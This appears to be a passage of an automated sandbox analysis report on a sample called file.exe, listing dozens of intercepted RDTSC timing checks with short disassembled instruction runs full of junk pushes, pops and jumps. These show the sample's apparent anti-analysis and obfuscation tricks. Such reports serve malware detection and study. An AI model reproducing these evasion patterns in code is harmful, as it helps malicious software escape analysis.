              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A491 second address: A4A49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A620 second address: A4A624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A624 second address: A4A637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007FF7B0C9CD48h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A637 second address: A4A63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51868 second address: A51878 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FF7B0C9CD4Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51878 second address: A51890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF7B0F3BFD2h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50344 second address: A50352 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF7B0C9CD4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50352 second address: A5036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF7B0F3BFCAh 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ecx 0x00000010 jp 00007FF7B0F3BFC8h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5036E second address: A50374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5065F second address: A50669 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50669 second address: A50685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FF7B0C9CD46h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50685 second address: A50692 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5095D second address: A50961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50C36 second address: A50C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF7B0F3BFC6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50D8B second address: A50D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50EDE second address: A50EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50EE2 second address: A50EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A511C0 second address: A511C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A511C8 second address: A511CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57E09 second address: A57E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57E1A second address: A57E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jne 00007FF7B0C9CD4Eh 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jbe 00007FF7B0C9CD46h 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57E4F second address: A57E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57E53 second address: A57E63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FF7B0C9CD46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA082 second address: 9DA086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA086 second address: 9DA08A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA08A second address: 9DA090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A56CB6 second address: A56CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A570E4 second address: A570EE instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57212 second address: A57237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF7B0C9CD46h 0x0000000a jmp 00007FF7B0C9CD4Ah 0x0000000f jmp 00007FF7B0C9CD4Dh 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A574D8 second address: A574DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A574DC second address: A574FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF7B0C9CD56h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A574FC second address: A5751A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF7B0F3BFCEh 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FF7B0F3BFC6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5751A second address: A5752B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A577DD second address: A577E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A577E3 second address: A5781C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0C9CD53h 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c jo 00007FF7B0C9CD57h 0x00000012 jmp 00007FF7B0C9CD4Bh 0x00000017 jp 00007FF7B0C9CD46h 0x0000001d jnp 00007FF7B0C9CD52h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5781C second address: A5783F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF7B0F3BFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FF7B0F3BFD5h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5783F second address: A57850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA2D second address: A5BA33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA33 second address: A5BA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0C9CD50h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA49 second address: A5BA5C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF7B0F3BFC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA5C second address: A5BA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF7B0C9CD4Ah 0x0000000b jns 00007FF7B0C9CD46h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007FF7B0C9CD46h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA7D second address: A5BA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA81 second address: A5BA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA85 second address: A5BA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5BA8B second address: A5BAA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD54h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B313 second address: A5B317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B317 second address: A5B31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B31B second address: A5B323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B486 second address: A5B49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF7B0C9CD46h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jg 00007FF7B0C9CD48h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B49F second address: A5B4BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B750 second address: A5B754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5DEA7 second address: A5DEAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A642F4 second address: A642F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A642F8 second address: A64321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FF7B0F3BFDEh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64321 second address: A6433E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF7B0C9CD46h 0x0000000f jnl 00007FF7B0C9CD46h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6446F second address: A64473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64473 second address: A6449F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF7B0C9CD53h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6463F second address: A64649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF7B0F3BFC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64649 second address: A6464F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64A77 second address: A64A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0F3BFCEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69498 second address: A6949D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69639 second address: A69640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69640 second address: A69655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF7B0C9CD50h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69655 second address: A6965B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6965B second address: A69664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69664 second address: A6966E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF7B0F3BFC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69ADF second address: A69AFA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF7B0C9CD51h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69AFA second address: A69B29 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF7B0F3BFE1h 0x00000008 jmp 00007FF7B0F3BFD9h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69B29 second address: A69B39 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7B0C9CD52h 0x00000008 jc 00007FF7B0C9CD46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69B39 second address: A69B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 js 00007FF7B0F3BFC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69B47 second address: A69B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69DEF second address: A69DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C7CC second address: A6C7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C7D0 second address: A6C7D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C7D9 second address: A6C7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF7B0C9CD46h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e jc 00007FF7B0C9CD5Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C7F1 second address: A6C7F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C950 second address: A6C964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0C9CD4Fh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C964 second address: A6C96A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C96A second address: A6C96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C96E second address: A6C974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6CAF5 second address: A6CAFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7474A second address: A7474E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7474E second address: A7475D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FF7B0C9CD46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BE01 second address: A7BE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BE0B second address: A7BE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BE10 second address: A7BE17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BE17 second address: A7BE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF7B0C9CD46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BE26 second address: A7BE2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BF6B second address: A7BF7F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7B0C9CD46h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FF7B0C9CD5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BF7F second address: A7BFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD2h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF7B0F3BFD6h 0x00000010 jmp 00007FF7B0F3BFD7h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C281 second address: A7C29D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD56h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C29D second address: A7C2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C433 second address: A7C447 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FF7B0C9CD4Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C447 second address: A7C459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0F3BFCEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C459 second address: A7C470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C9E6 second address: A7C9F0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C9F0 second address: A7CA1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD51h 0x00000007 jo 00007FF7B0C9CD52h 0x0000000d jbe 00007FF7B0C9CD46h 0x00000013 jne 00007FF7B0C9CD46h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CA1B second address: A7CA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8355E second address: A83577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD53h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83577 second address: A8358E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8358E second address: A83592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83592 second address: A83598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83598 second address: A835AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF7B0C9CD4Dh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8374C second address: A83753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
